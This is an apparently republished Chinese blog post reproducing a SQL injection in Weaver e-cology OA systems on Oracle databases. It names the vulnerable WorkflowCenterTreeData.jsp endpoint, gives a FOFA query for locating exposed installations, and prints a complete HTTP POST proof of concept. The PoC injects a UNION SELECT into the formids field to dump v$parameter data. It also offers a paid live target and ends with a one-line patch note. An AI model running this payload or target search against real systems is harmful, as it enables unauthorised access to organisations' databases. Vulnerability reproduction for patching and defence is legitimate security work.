前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >[0day]泛微 e-cology OA 前台SQL注入漏洞复现

[0day]泛微 e-cology OA 前台SQL注入漏洞复现

作者头像
用户1631416
发布2019-10-15 15:29:41
3.3K0
发布2019-10-15 15:29:41
举报
文章被收录于专栏:玄魂工作室

本文作者:CreaT0ye(Timeline Sec核心成员)

本文共643字,阅读大约需要2分钟

0x00 简介


泛微提供了移动办公、微信办公、协同办公(OA)、流程管理、信息门户、知识管理、费控管理等功能,适用于手机和pc端,是当今比较主流的OA系统之一。

0x01 原理概述


该漏洞是由于OA系统的WorkflowCenterTreeData接口在收到用户输入的时候未进行安全过滤,oracle数据库传入恶意SQL语句,导致SQL漏洞。

0x02 影响范围


使用oracle数据库的泛微 e-cology OA 系统

0x03 环境搭建


在线环境(限今晚):

打赏(任意金额)+转发,联系作者获取

FOFA搜索:

app="泛微-协同办公OA"

自行搭建:

公众号内回复“泛微环境”

0x04 漏洞利用


找到oracle数据库的泛微OA系统后直接使用Poc(已公开)

如果不存在漏洞,则显示结果如下

如果漏洞存在,则会直接回显很多数据

简洁版Poc如下:(勿用于非法途径)

代码语言:javascript
复制
POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 2236
Connection: close
Upgrade-Insecure-Requests: 1

formids=11111111111)))%0a%0dunion select NULL,value from v$parameter order by (((1

0x05 修复建议


官网已更新补丁,请尽快更新。

参考链接:

https://mp.weixin.qq.com/s/gbr_iMRbcvGtzFenNah-lg

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-10-11,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 玄魂工作室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档